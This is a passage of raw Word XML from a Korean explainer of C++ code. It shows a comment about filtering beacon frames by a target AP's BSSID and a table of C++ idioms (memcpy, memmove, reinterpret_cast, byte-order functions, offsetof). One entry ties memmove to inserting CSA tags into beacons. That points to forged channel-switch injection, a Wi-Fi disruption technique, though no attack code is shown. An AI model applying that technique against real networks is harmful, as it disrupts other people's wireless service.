          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1A1A9C"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">// → 관리 프레임 중 beacon이고 BSSID(addr3)가 지정한 AP인 것만 통과</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:before="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7. 이 코드에서 자주 등장하는 C++ 패턴 정리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패턴/문법</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6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 및 예시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std::memcpy(dst, src, n)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6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src에서 dst로 n바이트를 복사. 포인터가 가리키는 메모리를 직접 복사하는 저수준 함수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std::memmove(dst, src, n)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6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memcpy와 같지만 src와 dst가 겹쳐도 안전. CSA 삽입 시 뒤쪽 데이터를 밀 때 사용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reinterpret_cast&lt;T*&gt;(ptr)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6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포인터 타입 강제 변환. uint8_t 배열을 구조체 포인터로 해석할 때 사용. 예: CsaTag* csa = reinterpret_cast&lt;CsaTag*&gt;(buf + pos)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le16toh(), htole16()</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6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리틀엔디안 ↔ 호스트 바이트 순서 변환 함수. 네트워크 패킷은 LE(리틀엔디안)이므로 숫자 읽을 때 변환 필요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offsetof(T, m)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6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구조체 T 에서 멤버 m 의 바이트 오프셋. 예: offsetof(dot11MacHdr, addr1) = 4 (앞에 2+2바이트 있으므로)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static_assert(조건, 메시지)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6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컴파일 시점에 조건 검사. 예: static_assert(sizeof(Mac)==6) → Mac이 6바이트가 아니면 컴파일 에러 발생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std::cerr &lt;&lt; 문자열</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6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에러 메시지를 표준 에러 스트림으로 출력. 터미널에서 빨간색으로 표시됨. std::cout은 일반 출력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비트 연산 (&amp; | &lt;&lt; &gt;&gt;)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="62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&amp;=AND, |=OR, &gt;&gt;=오른쪽 시프트. 예: (flags &amp; 0x10) != 0 → flags의 4번째 비트가 1인지 확인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00" w:before="4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2"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">— 해설 문서 끝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2026-05-02T16:26:54.554Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-05-02T16:26:54.555Z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